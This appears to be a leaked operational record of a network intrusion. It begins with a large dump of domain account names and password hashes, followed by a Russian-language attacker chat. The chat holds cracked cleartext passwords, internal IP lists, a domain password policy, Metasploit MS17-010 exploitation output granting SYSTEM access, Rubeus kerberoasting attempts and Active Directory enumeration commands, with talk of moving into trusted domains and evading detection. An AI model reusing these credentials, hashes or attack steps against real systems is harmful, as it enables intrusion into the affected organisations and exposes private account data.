3234 jlkraft 2590913f809b8930b7b7338e56228785 544
3617 sbhaugen 746a427b1b8edbfc6a0320258835cf37 66080
1626 m_dewexr af2d43ceaea484e7871bcb902756b2f9 514
1621 jebeithon 1b1135cb9431cff7b48447d86d0f39ad 66048
3240 jloh 0f564bb6b25912dc51eeb64a9bf30389 66080
3239 mleon b2dc81d287286332b163deb7d993be68 544
1571 Lkgrunew 3b4e6bbb125bb148ad8b0ede912eacf6 66080
1325 cbstigen 5654690ff05f50725ceec956aff0368b 512
3230 kdresow 0e342dc5277c074d71a64e61ae82819a 544
1946 tmdewey 9806ad49e12ad478ac5c3c47b4775a7bad9 66080
3231 mlromslo 9af11b0af4f5c499b1585f7006d3f0af 544
3241 efevavold c721e2a5c9fad69f68d1d9f7233d0a09 66080
3242 dmgrothe 68d158ffe0ae5e8c03893cdcfcdc9183 66080
1707 brunsmfp 2f891514a09b310c5e184bdf123dd635 512
3754 jgmitchell 8cd2209358a8e86b0c7b65e9863f7f38 544
3244 aarosenkrans e89898c83b3b04cc87cf2ba0f1befce9 66080
3245 tthagen 8a3fae86b263434cd7d27c58418823db 66080
3246 lljensen 24cc4a64ec9ea3b23166d44427b96c79 66080
3785 pmhabberstad 7a21990fcd3d759941e45c490f143d5f 544
1759 llpearso d6dc83575443fa81b7b8a484539eb29a 512
1893 mmbarnes cbd188dd7ea8598cefd6533896e6fbd7 512
1202 jea e86e945713819cac1d04720f51e1f7e4 512
1536 djlandmu e181f457342748c4cd09dad958e72b0e 512
3760 pmiller 50ae45132343dd3950795d4ba213912b 544
1710 bmpetemu 4a5d2e77270842ba4d43ab14bbc92ba3 514
3238 bemery b5f84ffe29fdd2ccd34a98a2af1041a5 544
3162 MRNWKS17$ 52f187408f397f3a73b6d514a1101fd0 4096
3777 mstayman 95087e883541e580da2d78a0340288c2 66080
1441 jeprice 0b8557714db41320768a6c8ff3ad8d0b 512
1934 ewolden 1b123eda9c30734c5349be5ab95e622b 512
1624 ldcharxr 10d51136ecae056bd31609d64c39cd91 512
3775 tsofficer db3dcdee7088c54347ecb9d337c6e6c7 544
1297 maryjotonneson 651de33d6cdf9231b43056ff7071601f 512
1180 ajfishsu 4e173f53ea685937facdaccc764bb322 512
3616 sibowman 883657c785794a6c66245708bc0a146c 66080
3782 Kmfinkelson f03cccbdab1380b0c3deebb5a2476f12 66080
3766 lnelson 9fa0ebbf5f3d64d488ee1462baa23e18 66080
3663 ljdingwall a44fbb7283ca381cbacd6d8fefd79424 66080
3176 prhtech db2e2e2db5de660a4e66952e7c340dea3b 66080
3252 ebecker a6564f0d4c7b3e8ec13889ede1d1b4fc 544
3253 sknaus 287d4519e3da6469a4f572378050f56e 544
3254 hwold adc85782b0a540f111f66b48fafaaecd 544
3697 lrapp 5aa11bbfbf48dabaac1b3f618a03af82 66080
3711 wlnyman d0e5676e1f18e67d6e9392ac5887ec2c 544
3778 rcampbell 0188aabf6df8847800e1755889a8fa0e 66080
2075 lkbarthel c9719528f8f9ebd659840786bfcec068 66080
1402 lrwhite 5e5fab4d07e0c0d0df0f6a42dba9fc27 512
2072 mspeterson dc87be1856ba6fd7ed533e27f2a40545 544
1650 welccrxr 78215d449c6f17482b541ea20cba4a93 512
3675 MRNWKS18$ 71a27e0b7f8fab8e51be242bbd34f5f0 4098
3789 grhtech c86c5af58d28542d1947fbcb901a8299 66080
1866 lastoll ef42a7d6774983241a2a55247b96b72 514
2604 kjkemmer 606aa7efd3d9d3c96af8b9219e595cd 66082
3175 lfabel 90153dd7c07d2e412e2670e22b958ee4 66082
1681 kanoyecc 60e698666b0a2b6941a72ac4aff6a4d9 512
3721 khokanson c0aa6268feedbfcc8b2ffef3f072dab 66080
1647 lkthomxr 7bac175452ce652677262dc8009e89d8 66050
3268 tlis 0c5e5cca01119988aded6eeb6d1e5867 66080
1206 drborowski bcae9cf983d6e62c61c18f6dee82a607 512
1905 ajmelberg 27faf911827510ef3f2017aa39f948e6 66048
3765 dpickrell 8fbb36341e774e2e491adbb461695f97 544
3278 dlesmeister 7a21990fcd3d759941e45c490f143d5f 544
2093 mnkowalski 572356a7e037ebd894226cc60900eeb9 66080
1188 pmrundsu 8e6771b224e703dbbd186bcc343c0239 66048
1703 lebuchmu acd35ec2b7ec25a37c8b935a3565b1e5 512
3634 bdlarson a573af9f9250995ceb4d2342e40bd895 66080
3112 MRNWKS13$ 53ba223a954a866b916b68a12738c12b 4096
1240 drmatter 966440c2b1a673166d488f3891a80efe 512
3698 jhoffman b4855825ae580cbd2015e734299642e2 544
3280 TEMP0$ 8252bbf03e3db69e1d872e2c1eb5ec17 4098
3710 bmbeckert a498616fd144dd0681a224d4690eee7c 66080
3122 hmshol 476d0ab3ac09690e864c11e05d371276 544
1165 t_martcc a44772032da791fadc285212cf1912c3 512
3273 spatel 072173c87f28720a583f890ae7559946 544
3274 jcorry 150873b40164b420d7117fe7d4309e62 544
3276 kesse 9b69e8d44bb99f05ffc210987b6edab3 544
3277 dgiannakidis 4468caf7a3f7440bc99a04bd34744e7b 544
1833 jehaarstad 4cbbc36ab7ee30cab782e16ea4270e45 66048
3784 cdcooper 48b214605ef262be9290e474f5271cc4 66080
2038 mccooper 982fccae904b0cf57fcabec3e9cdd0d1 66080
1929 baduenow 655e06636ca0e2682294c6b86d2d41f0 512
1654 n_aslaor d35cab41444ebfa7a8246385a09c82a8 512
1659 blmulvor 17b856dfc50b19e414968a6a2772e34e 512
1573 MRNWKS12$ ae39f114a0924f2b703e5628b5a1f226 4098
3266 lddivald 3de8505c35442ae80184a6c784a4e0cd 544
3787 bsmith 4472910b89492aef53ceb6b420b15f52 544
1835 b_glassu 67f5296cfe35af81a281822f5789cff2 512
3693 mwood 05355201b0e8036a0f80e48d4d4a454c 544
1321 anesmgr 606824736dd2645664eaf79fc31d1956 514
3796 bdfagerlie 6650c25cf1a1a7345926de9fceebdb58 66080
3797 kanikcevich e3a2323f39581fc51aee293e5e50c944 66080
3606 clboyer f92df27b803395ca73751f297872fae9 66080
1748 laandebi cc4e0355850bd035fa09905f53f28aed 512
1428 mdflugstad 73f003f0d842f1f55437bdecc14a3baa 66048
3800 rmassaquoi 5c6cee0597fea0b5a32fe545ed9d8f18 544
1323 tracybeckman 998330048814c2a6e1b121ad0700c1a1 512
3772 pfshol 99e02a0cfe154a568c2f335a1cf41391 544
1450 katlynbockman 5cb6367e176a3a44fd38aac5e1a51d 512
1721 dlmortfp 7e32de26ea37ea0868cee8e8f2632a71 66048
1705 pabaglmu f2cce80cf6e95ddfb8da2fa7c3cfc823 512
1300 mllohse 64f2940a7f7e98b39f40b1c5c769525d 66048
3793 cthiele 9f12a60fe10fce15ceb8ca440e7bda32 66080
1744 j_haasbi 3ae668e7cce8b8e300fe2e8b81ed7393 512
3791 latkinson 7a21990fcd3d759941e45c490f143d5f 544
3801 holson 7a21990fcd3d759941e45c490f143d5f 546
1655 orasst e3853b1f7355a76024e5978553b7e0d8 512
3179 Dcarndt c68dd631d5061b45779948d721716c24 66080
1808 whithrpt c709283b34de77173d0fafef50155632 512
3719 hdomek e0e50b795008b41856709a1d730aded3 66080
2052 tjkeller 775502b4d04a9f0d89d7d9fec9e67b33 66080
1223 mjn 1c0c10d5bc5ecd940fd491dcd67708 66048
3757 rrkester 33e61ce5f2e9cd59910e05b7c08be164 66080
1312 tmmark 01ee5ba08c4c30b61fba9d4cab74b38c 512
1618 mmalsgxr 32338b657b31149f135e177817d92d61 512
3798 tthacker da34b93958c0400f3f09d2ebc7f4cfcc 544
1697 mestuemu bbb4d417ad2061b15ba4b5f19a7bc840 512
1917 clcabrera 60a1eaac00fc84116560ede5db72c2a5 66080
1461 pjmarlot 8c8d459602830c8dc0a961b32a298a8a 66080
3803 haileyolson 51bda3bd385b2fe8e58927e2287f10 544
3629 abashir b5fa34e6c385bf96ca0028adf95128aa 66080
3795 mamunich 63919ea605bf5b36d96b7115af87a96d 66080
1448 drgupta cd16c8e938dd145c40ba9159c9cfb225 66048
3657 mmlee 2556b0a43ec0860d2547b285ac850d63 66080
3799 aemami f0b3802b0629cd85fd862caaeb9e119f 544
3190 klfuchs ad67ef3d1f01f2ce38cd606457e53dce 66080
3271 shanson c12db14a5dee7c993725969810cf5f48 544
3284 koltesa ed28d4db9d6d176ffcebd697d49c2538 544
3713 sanderson 2797fb2bef6849caad893f8ea30efcda 66080
1844 radefelice 06494501ef20b85f6517e1982511e4ac 66048
3722 notto 7fe981532394e2dc8c42c9cbc2a00568 544
3788 echexum 3fceb45f9810ef7ee61bb7aee4f87ff3 66080
1549 klbrummer ff6e02d7831f231a6c1c389d2b903fb1 66080
1807 almqklpt ed41f3390969fa51561c2e2679cdb065 66048
3727 sschmall ad23f058442413fa492a8b9c42722297 66080
1515 djpreston bd893dd5ccb9540c97f1b09f499bc524 512
1352 krheidpt 8d483b8055f2b79a9f83074e545c9321 66080
1754 alkuglmu 176b6ac8c9b3a80b10b9acb5f6420e6c 512
3285 lncunningham 1dea8a82847137ac244cad5157d9095e 66080
1619 kaarndxr 377871bc88640737991a91ee2fb63cb3 512
3792 rerickson b74f6805d5aec51aafccdb10e10d7dc0 66080
1434 sewilde 4164ae41a3d33fa45f88602f17b59e14 512
3283 lapointb 0cfa5bed8c8fbb3435bff603824ea9d 66080
1205 dtbjork 0c47178ff33cba3a38863ec09c60f00e 66048
3804 dlconzemius c2720f7eb4c0ae044b6f784882681d43 66080
3250 bmkraft a0e7c1995ea0d8de8b5936a8e2f4d9c4 544
1887 klkeller 80c8b29db94ed0b30dcd438dfae41a50 512
1466 dmanderson bcd95007ad292aa41e612fe16635cf7c 512
3620 tjmahoney 55c3fc77056307ad7c55f9001bb1be01 66080
1567 dsperr e2ce83b9895bab68023b3f8965d5e413 66080
3149 sacihak bb1ca804e39129284548b4144afa5efc 66080
1696 gelundmu 1f6a957330c98ec9247c1c73de1f1c39 512
3275 wgao 9fd1d13215e778089265d9c77811eaa0 544
2065 kkholland 62bcb945d2f22bd9296305df276fd120 66080
1923 taevavcr 1afbdc5b577af28262d9f9f97091edf5 66080
3774 aaengen 6a36260f41dbfdac767d0838f60ba28b 66080
1945 nolson 0f784ad40710074048e105d508d9c8d86 512
3763 bbartell 44837d1d8ddd2901d5ce7b01679406f2 544
3753 anhunstiger bd9834b1e396f7e5c0a3627abca2b79b 66080
3631 ajevavold ecc56abc4486fbce0cbca1ef10c0a2bf 544
2018 aapeters 78311337e0e3c18802aa4b529a73a4f5 66080
3223 agupta 7b9d0d8a3e343866f174cf100d437339 66080
1796 carrie 7731dfbe3c47eac2765a137982b2338d 512
3779 Sstallman 41ab808371fd0290177402d4b7083414 544
1870 lmrud 4f4a3dbd0923b926a7c5385c68826c5 512
1507 lknutson d8a73e5661f56ccedfe2c291cbf79ab2 512
1658 smlapoor dd90179a47a25d3ff2397d5435c22a19 512
2087 tlbolluyt cff458f1414179962d61696e8ba2fdba 544
3773 ewoodke cd96953d72f3de97cf6fe6f54bb92f9547 544
1216 drlindholm c075a7246f4c8bef9d38a2d3a133bc2f 512
2040 llsiems 8cfde151045c5f9397ac0e226dae041a 544
3195 jsbigelow c8795e154577c9fc3d9474f979332c62 544
1628 rlgragxr f5c80f2d74103e9fa4f159a42c5606e1 512
1413 drtate 01ee5ba08c4c30b61fba9d4cab74b38c 512
3180 rrboesl d5b053724212803becc83dfebc87cca3 66080
1693 kmbugbee f941649e8f47b442b849646d0e9fbda0 66048
3689 adgenereux 80124839fe1e372436e4c7a003ff0841 66080
1552 almanning 890e84ad97cb8d2d1a2196feb89e1aa1 66080
2061 lstage 646a44785b574f9eeb2d6dd39fbc8713 544
1731 d_barkrc f45aac15e69acd4d8f909c616e5792d0 512
1690 ardeutschlander 06ab83fa6bef64787596b2e7dbff7e0e 66048
3255 amandak 8f2e0effefe9ce900f0af39654efb42f 544
3118 scpolzin 090a334bee52ef0af8d15eed4e67860f0 544
1777 smhanson 2f2cc839a042f276010567334733f55b 512
1227 drsamson a1079f9d031a997fd2ce2f5475701de6 512
1171 tjloxtmu 9e74d3d34d49e6255cdf47423971de78 512
3143 mchristianson c549a587fc362d601d0a52492a4f9ad3 66080
1874 drglynn 606824736dd2645664eaf79fc31d1956 512
3243 wjstoll 463689d49c56b5cb9df07713ed9bf349 66080
3768 kmmartin 65a72bbe7eb27d0bdaddb1514bc17f27 66080
3621 jkpetrick 1fff5ccc480ed1c9af0d26f0370670f2 66080
2084 ambell c515d94ca7d4785b385f30b330f5ff26 66080
1299 missyhalvorson 4296577fbc12ebd93e998c7a636696a5 512
3681 cmschnurer adb4a2e8507a8c56d93600d145b6985a 544
1236 eaw 36f8dee2ff0c6e543fd59c047f67c8d2 512
1290 kimborgos 9b71edf13ad0572d0c45e39996c93691 512
3201 fbackman 244604ce957b7db25f7a26d29d782059 66080
3267 stbsmith 2f80cfd4647edf90c3b5c062e19cd953 544
1377 ctlarsen ca7e8ba4c5738e8919e047a67f91a688 512
1222 bem fbd5a20b0af06c7072f66d3e601f5df7 66048
1656 s_hoffor f6ac816feafe9a48d558c5c5c275163b 512
1817 klvillagomez cb07f6a4efd0161ec072c7043ec282af 66048
1620 gib 78cee4448b7f2c765c2e5773b04c9296 66048
3755 mbropes 7dc6c11be7bc7ffde538c61e937a3061 66080
3270 tjerickson c4c9bc11ccdc61ca0fa178335c89f11a 544
3756 ljhegewald 911b036eb67a3c3613aa586389b82df5 544
2043 orthompson 2f0b69177ccfca8ff22d99eb5ad33f7c 66080
1233 drvennerstrom 4fbed754b567cab978731a901070d06f 512
1250 drnoyes f45a632c42d72767bc0bd24cb3738619 512
3794 sjbroadway fec7f2e406f5fcdf259d41c68dd391ee 66080
3226 MRNWKS20$ 3c062810ba76be858c7168c102f017f4 4096
3644 NWKS15$ f4a49d5d5afe33be31b22bbf34c3ffcc16 4096
3279 keddy 4d633061f7446e627fab789452eb001a 66080
1508 amfries 46970abf77cbe0922b0fef23209f6c4b 512
3256 markg ab5058c6d7df4267b8810f2c687c94c5 544
3790 jrtotland 218143d40917d213ef5dd38998ee45e0 544
3123 ksmith f1c0c855344c74f985318e0593ceeafb 66080
1633 jajansxr e863cacd5e1c01a74b3b90fa62614df0 66048
3263 jessicao 062b97e0ef98fb82a9d8751fadf4040e 544
3282 talacey b81b54d6537f63abe40c0bbfe95d9a1a 66080
1520 kjnordick 7a32637f352e6251c468fbce69a16af3 66080
3171 kglanz c74f497e527592c592682cbf43c13907 544
1212 jhorak 6084ae91972fbeb924a2c906bf57c0ab 66048
1888 jcbengtson 71c261a2f43ffe580f929d63cc07f70c 512
3805 tddonahue e4b4f74a11c7849a43c41a1aaaa6d769 544
1502 NSTORE1$ a7ecca7ada2e5e7460be17cd3be17451 4096
2028 MRNSERV0$ 3b7dca99302839049a812e34ee396e30 4128
2027 MRNSERV1$ b6db88adfb0d3292eb81c07aa0be29b 4128
3649 MRNWKS16$ 616d340582257213f48c5a31dc4bbf4f 4096
2032 MRNWKS3$ d84dad55fa5b4e00bd76a763eb794a62 4096
3222 caaase e18ca25635a48c99e81622bed575a0dd 544
3281 dlholzer 35235e5d7c7f4fc6b4b9b20bd644ba7a 544
3132 sjreese 6f712741e060f625db4c79632f6ab668 66080
3647 eeverett d382a68cd4cadfb315e090f0e25fe8 544
1638 klosprxr 4a4113c6269fb6affdc7721171691bfe 512
1527 NWKS16$ 9f05b3181145e48180859495e362189c 4096
3802 lkatkinson f5370a2cb0c74941246b8f314595851b 544
3696 sberg db273ce36efee2d860acdc2a6562a3c0 66080
2044 kjkhaghany 721e94d3c6fb6495f987ae4e9974ed16 66080
3144 clschmidt b99e2e175c81d852b1ee7630c3afe489 544
3665 MRNWKS15$ b72d2ca3ccf02632ebcecc7d0ece2f69 4096
3247 akwalvatne 652fab17e41dd3879b9b9fee393e4d3b 66080
1378 paragon bee6ea7d7368285956f0158844283bb5 66080
2002 scschmid 6e40d6d997a5d7621a3c51f836c2c9f6 512
3184 tbuseth 1a60a6e3a4db305a9cbc8fc4522eed2d 66080
1725 krhammer 8b6ed8f3965da2296f924c4dc7cda017 512
3227 srmabanta 8e9568f4d0e46735f731adcbd02ff3b2 66080
1809 ewleopold b5a372118565ff272d600097181272d5 512
2070 kmochsendorf 65a13a298816a8804ad0e56f6d066052 66080
1370 lmbaez a2c4803d9e45db3c8fea23335f425a3d 66048
3692 pholmes 9361c8cfcbe72efc56fbfc38bfd3ac34 66080
3715 cosborne c5ffa688e2eaf45e3aaddc670d60e924 66080
3695 snordby 7b3690121840a53b82e38c9d84cccd3b 544
1978 sjaday 2aa8d3a2efecf9392bdad316ffe58204 66080
3287 ahmeda a786dde97ed0e8a0dc4b4101b89d0354 544
1985 aaltamirano 14633fe81d99ada0956694ccef9c77e7 66048
1623 boscjlxr 60715fe92ab15af8b5a6eb78908eba1e 512
1646 jmstyvxr 249dd04b3c41068af6c58b94c44aaf69 512
3786 alharnisch ee098fd8f7bd735743966c13570a0086 544
3251 mecker 8908a51e1f8985b7cb9420848c9f46d7 66080
2035 MRNWKS9$ 3c0b0db88bb2d8886cb25f5c68a71e16 4096
3668 LRHC$ 6da3553db64a74927e867700459ec640 2080
1506 jroberts 79828a3a4c96b7970e8211f140636f18 512
3286 herbaughb d827ee57145e0d8eceed6313358511fd 544
1784 sborsgard c18b6543a6eec71f44a94ec05474f792 66048
3258 lindsayw aa6c3883788ac2f71d00f3e5dbbfb35d 544
1629 kmhansxr d66e52a5f21e0d39eb4cef8c6bf05737 512
3213 kpiechowski c59c8922de63bc3c2136a52f4c1c6334 544
3610 wcporter f70d8147f106cee0fc67d4d2e0fc6ecd 66080
1609 klr d23713c8361026ad0a8f710ceeb1c6de 66048
3228 kigriffie 71eb4f33f5b68b91d34c1e56feb72cd9 66080
2034 MRNWKS6$ 4315e02ab31cbadb75deebf29aee3f4c 4096
1965 laspangler f2f30efb3bbe1993d17ddb853d4ad569 512
1644 lbheiden ea69b248b4fb74e5076c4e6085376236 66048
3767 mbsahin 6f18c8d46bee3e37db945fb3f6fb92f3 66080
2086 joanderson 5afdb1e681f188213cb5affb6c79df9d 66080
2030 MRNWKS7$ b96691c586b3657a952ef8ea1da74ac5 4096
2041 jdovergaard b47a066f40ccf1d76fd4000cfaa35d13 66080
3646 mtbenson 6d5b86313752d11db7997a34e12dc0f8 66080
1110 alibe a80fdb8db842a99d87ef3d857f8ddcf1 66048
1108 ali a80fdb842a99d87ef3d857f8ddcf1 66048
1642 drorandi 866b8826bfd5fff14c59775e5729bafc 66048
3152 cjedin c21f1b18aaac94f439332acb78ab4532 66080
2036 RADDC01$ ac668ff27865e411e6a3198940ed2b5f 532480
1572 MRNODE1$ 59a564e81ef6c0c37df0d60f8527a6eb 4096
1579 RADDC02$ cbdabc82ea9ee3d8d804ba2b9f89dd04 532480
2024 MRNSTORE0$ b928b07146e0445419dd1699b3cca5e0 4096
3725 abuehring 65be0db2b857963ad796e6e0d0def162 66080
2026 MRDB-CLUSTER$ 15e0f37b3609471f835ae577085e23a0 4128
3677 MRNWKS19$ e21efb05c6ce9ac89c2e7e30dcf49c62 4096
1698 apschrmu 2a6d0812775eb89f6f3077934bcf95f2 512
3183 elynnes a6ca874c62b05d592273dd708ef187d2 544
1797 drmouser b56354d9266cba25422ab15e8547bcf5 512
2102 LRH-DYNACAD$ 4743dfcacb4876815bf14b75f4acf9ae 4096
3269 mrlee b5b7af6574a6f394e855649382cda928 66080
3196 cplindgren dc316faba52608ac3f441c84727feab0 544
1862 rlkaczmarek f5f1b18257325ed5fe2e87d0aaf759e8 512
3260 briannav 107e0ca156a9c8cab7be287dcd41aaec 544
1631 slhighland 2da4bf65438772db6ceb5ff2d409e57d 512
1649 sathomas 8346863b35867cd414e4e3731ea2da4b 512
3114 chmiller a1f79ae5f9a44c0cba0b6c06bd1e1f5c 66080
3262 morganr 1d0b364bc66b6c951599e11c914e7e7d 544
1568 kolson 058405257249b0c11ec365f8a6370982 66048
2029 MRNWKS10$ f658d35e5cecd87b58e87fe7857b1b2f 4096
1453 skerr 323fcf8e029f3231fd4121a3826a20f3 512
3229 mhalsumrain 695d0eefdfabb555707356abede42eef 66080
3694 krogahn 52879cdd1a4b4923e67fd6f4e2cdfe53 66080
3214 thovde 5587afee05c46b510a50d9e466170d34 66080
3264 stephanieb f5aaeeb4c446730ca370dd949c7fb0c3 544
3781 Kmikkelson cece59201cfefd426aab5fb76db4e59c 544
3771 kjschulte ced6be295f37375e1213919fc8e36043 544
1630 kjhatlxr bf4c3092a586df1a9137a4f5737bdc94 512
3261 brandif dcdc950485cb74a73bf4bf80a4101dac 544
1524 alinds ffd6d72372040691add367549b688221 512
3259 ruthj 6759d99e6711980d074fecb45aff5b55 544
1639 j_larsxr 4f7c65775d8bda83d8216bb2091917cf 512
2047 caaffield 92961d60f619b6063bfd2765a679dc82 66080
1548 maolson 85b0a1c1f6f44a83cc75b62dde6f0eaa 512
3199 smartin 75e426efab18059cfa6684258f4a7d3a 66080
1449 atduenow d245b15328227ea8c8307d7aae721a73 512
1575 MRNWKS11$ 29e77d391aa2f097349593368b67cb18 4096
1636 mtkerrxr f902b05bebc3d13fa0187f84a44b0e1c 66048
3137 MRTEST0$ 28c309a1ac3eaa0801839a1e991561b1 4096
3752 mbhintz 207c08a4223d1b19c53eda8e717d5129 66080
1551 crott 5ce23e414589110e9fba3537ae619600 66080
1475 kbaumgartner b348e7647e07f39ef4d706ab455342e6 512
3249 mthovland 75770dd4f66f4ed318db64ad1ce80b0f 544
1550 jeolson 62ff1aee79dada73b838aec7ca3c560f 512
3119 alasmith a8b89435d1634fd4f45bf671d030f11c 66080
2091 lljerger 7cc9ff2da474e85a3e24018222e1ecfe 66080
3202 jsplichal bcafe80cbf6ea2cab1a96a3612c6cf03 544
2098 metungseth d9840a8afed2ee1b85b8c1dce0a3517c 66080
1265 annlewis 47662aed884a95174de29f642ca62727 512
1847 warncmmu e5bee5800f65d4baf2fd1586ed7d91f9 512
1767 drlokken a73a9b3f676a4d888c4a5588b23a5521 512
1117 NSERV4$ d2984a8f64aba5ad5d32826bd079ae32 4096
3160 cbeebe 810c09ebbcb1062afb2534ecd6ed7a86 544
2033 MRNWKS8$ e25c5c3af53b8a77d1b02bdf95e04e5e 4096
3272 gasaithambi 605e5c6b40e4761041a2b9e86d8f737b 544
1280 janeshaikoski 8384445ee87621f5ec558039a4631833 512
1230 drwswenson 953f520c1123239f61fafd0729e2d1a7 512
3248 nmholte 6b5bdab1c58aba731f34c5aa9893e239 544
1392 drgutzmer 3f9bfd262caed9b0918ff698f290d982 512
1660 ganoyeor 0cfccc49bb0f47f8765a90dfa47ec2b1 512
3607 ajfolstad fb07bda7eb6eb3fa33c9cd7450dc19a3 66080
3265 clstevens c0a90aaacfed09136dcabf7540124dc1 66080
1855 mtvukonich 51a9889746fe107c490c30c0372fb1ed 66048
1187 kjrufer 9d264109febd8b4aaec37f3467cd2180 512
3723 hstark db3d0ebf38ce9c5fb109294ac74eae 66080
2605 jpdinsmore a27cb2e1f9cde5f54f8c23a98e8600b6 66080
2031 MRNWKS5$ f94cf5e2f2c701d33571dc05dc22c1c3 4096
2023 MRNODE0$ e6f7d306302e941d4054d2f64697c775 4096
1576 MRNWKS4$ e2552f80f2a0486087f7250e87827f63 4096
1627 dldulsxr 47a0d7a2228cbe82a7d01204776cafd2 512
3712 kkrog 9de71f50a4cbb09c2e8bf0c21f0d9e67 66080
1199 mdstoesn 8196972a013c829e19ed30d4093a58be 512
3783 jbragland 13852671dbfdaf8f18f5421a04aab22c 66080
1651 jawestxr e666aafcf2ec56a38e12a903bb1778eb 512
3769 shdoesken ce58cc8ec2d8ee3b8588d1f01988ebe6 66080
2001 ndschmid 956d16814a204bb9050b4e1401f3a0ef 512
3289 smjohnson b2f73e099710c5f03524394f7276b01c 544
3735 emonroe bb325c88326c35682915d48170924800 66080
3257 kecian 2f09c790c9569a4e2da502ae93f1234d 544
``третью притянулпервые две не пришлине все прилетаютну дазато есть с чем работатьжаль не на дкну вот)``
Success: 'LRHC\pdsanderson:922.Hibe' Administrator
```
```
10.10.220.45
10.10.35.9
10.10.34.87
10.5.50.180
10.5.50.192
10.10.34.18
10.10.34.167
10.10.34.59
10.5.50.228
10.10.34.35
10.5.66.105
10.10.35.71
10.10.34.173
10.10.35.65
10.10.35.57
```теперь точно im inну всё)на двухопугуну пока что админ только на однома стоп ёпта он ж доменный юзер....да не залочить бытак и в чем проблема::(однако
```
The request will be processed at a domain controller for domain ffmg.local.
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 999
Minimum password length: 4
Length of password history maintained: 3
Lockout threshold: 10
Lockout duration (minutes): 1
Lockout observation window (minutes): 1
The command completed successfully.
````922.Hibe`так проще будетщая отпинговал в этом трасте все тачки и отпингованые пропустл на мс17[ ](https://mediaeveryone.com/group/lrhc-org?msg=oNfJkCtLxJjXWyW3a) этона деругие серверные оспроверь)))))))длка не летит``
There is not enough space on the disk.
0 file(s) copied.
```давай?хош ржакуинтересно)``
LRHC\pdsanderson 8a48ebb4e8aadeb8f71b999ba84ab520
``на втором вот однако``
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 10.5.50.192
rhosts => 10.5.50.192
msf6 auxiliary(admin/smb/ms17_010_command) > exploit
[*] 10.5.50.192:445 - Target OS: Windows 5.1
[*] 10.5.50.192:445 - Filling barrel with fish... done
[*] 10.5.50.192:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.5.50.192:445 - [*] Preparing dynamite...
[*] 10.5.50.192:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.5.50.192:445 - [+] Successfully Leaked Transaction!
[*] 10.5.50.192:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.5.50.192:445 - <---------------- | Leaving Danger Zone | ---------------->
[10.5.50.192:445 - Reading from CONNECTION struct at: 0x8ae943d8
[*] 10.5.50.192:445 - Built a write-what-where primitive...
[+] 10.5.50.192:445 - Overwrite complete... SYSTEM session obtained!
[+] 10.5.50.192:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.50.192:445 - Getting the command output...
[*] 10.5.50.192:445 - Executing cleanup...
[+] 10.5.50.192:445 - Cleanup was successful
[+] 10.5.50.192:445 - Command completed successfully!
[*] 10.5.50.192:445 - Output for "net localgroup administrators":
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
FFMG\Domain Admins
FFMG\psanderson
LRHC\pdsanderson
The command completed successfully.
``на первом не прошло`ffmg.local`
```
[+] 10.5.50.2:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit)
[+] 10.5.50.192:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[+] 10.10.220.45:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
``Rubeus
```
[*] Target Domain : mcklrh.mig
[X] No users found to Kerberoast!
[X] No users found to AS-REP roast!
[*] Target Domain : ffmg.local
[X] No users found to Kerberoast!
[X] No users found to AS-REP roast!
``````
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit
[10.10.39.73:445 - Host does NOT appear vulnerable.
```
:zany_face:ещё пытаемсякак прошли в траст?```
10.10.39.73
CLINICDC.ffmg.local
````ffmg.local\canderson Gt#832!e`через пару часов к вам еще 2 товарища присоеденятсядавайя поэтому и говорю ща пошукаю как в рубеусе домен указыватьи наоборотинвок керб нетчто рубеус находиттак бывает такоетогда скорее всего нет кербов в другихдас двух трастов?был пустой файл 1 кбайти какой вывод был?и с -domainмы загружали его в тпшнеттак вы на диск роняли и его блочило?так мы же им просили уже через ТаКтИкАл ПоВеРшЕлЛи можешь через инвок керб попроситьpsinjectтак этоща пошукаю на гитеа чет для рубеуса у меня даже не сохранено такого нигдея помню как инвок-кербом просилизабыл что керб можно с траста просить?))или в рубеусе можно соседние домены опрашивать?так тут то зачем рубеус? у нас же отсюда все хэшии отдай @tl2сразу рубеус подрубии пытаться пролезтьща токен буду натягиватьпонялты в трасте или просто сетку притянул?это не траста стопдаже мем поискал)2003 не притягивается:Dну, как говорится
im inпервая часть[ ](https://mediaeveryone.com/group/lrhc-org?msg=eRYWi5Wg6x3hrAZsx) не, хеш для всех одинаковыйна дедике в мсф не заходит чёт[ ](https://mediaeveryone.com/group/lrhc-org?msg=X33pSY4icNZ6ieosT) выше кинул что подошло из имеющихся ЛА и ДА, да и у хеша ведь первая часть от домена зависит же, он пустит такой хэш разве?скрин командной строки[ ](https://mediaeveryone.com/group/lrhc-org?msg=S9kX3FAeMYYh4Gdbs) этих ребят на траст тоже проверьтерезультат смблогина?чтобы ЛА запроситьу нас доступа то к дк нета не скажущас скажу[ ](https://mediaeveryone.com/group/lrhc-org?msg=NNGSmc9G4Ry5P9Ese) в трасте[ ](https://mediaeveryone.com/group/lrhc-org?msg=NNGSmc9G4Ry5P9Ese) не так прочиталмой косякаа я говорю про трасты вашего входоного доменатраст это трасттекущий это входнойкак я понялну текущий траст это ваш входной доменпросто в трастахчто))текущий траст??нетв текущем или трасте?на ДК где?я после того как загрузили и написал, что файл 1 кбайт пустой создаётся[ ](https://mediaeveryone.com/group/lrhc-org?msg=DiJd8WN9qHwQBDX9P) а его на ДК в ЛА нет?да мы грузили`rlschmidt` я под ним снимал инфу, его нет в трастахвы роняете скрипты зачем? грузите их сразу в памятьк вопросу о кербахэто очень хорошотак ну молодцы сняли ад`st.exe -b dc=mcklrh,dc=mig -f "(objectcategory=person)" > C:\Standalone\mcklrh_mig_ad_users.txt` пример командыа тот админ под которым снимали не имеет доступа в трасты?только у меня не отработалочерез -hкороче как я вчера пыталсяхостзапустил cmd от админа и отработал батником адинфо@user7 хостил в какую категорию? @hosts @uploads ?[ 